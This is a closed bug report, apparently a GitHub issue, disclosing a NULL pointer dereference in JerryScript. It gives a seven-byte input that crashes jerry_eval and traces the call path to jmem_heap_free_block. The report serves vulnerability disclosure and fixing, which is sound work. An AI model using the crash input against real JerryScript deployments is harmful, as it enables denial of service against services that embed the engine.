Closed
Description
I've discovered a NULL pointer de-reference condition within Jerryscript.
If the bytes - "0x27 0x5c 0xe2 0x80 0xa8 0x27 0x41" are evaluated by jerry_eval a segmentation fault will occur resulting in a denial of service.
It occurs within jmem_heap_free_block when block_p->size is de-referenced.
The call tree is as follows (generally):
- jerry_eval
- ecma_op_eval_chars_buffer
- parser_parse_script
- parser_parse_source
- lexer_next_token (parses the source for strings and returns)
- parser_parse_statements (throws a parsing error via parser_raise_error and returns to the parser_parse_source PARSER_CATCH statement)
- parser_free_literals
- util_free_literal
- jmem_heap_free_block (SEGMENTATION FAULT)
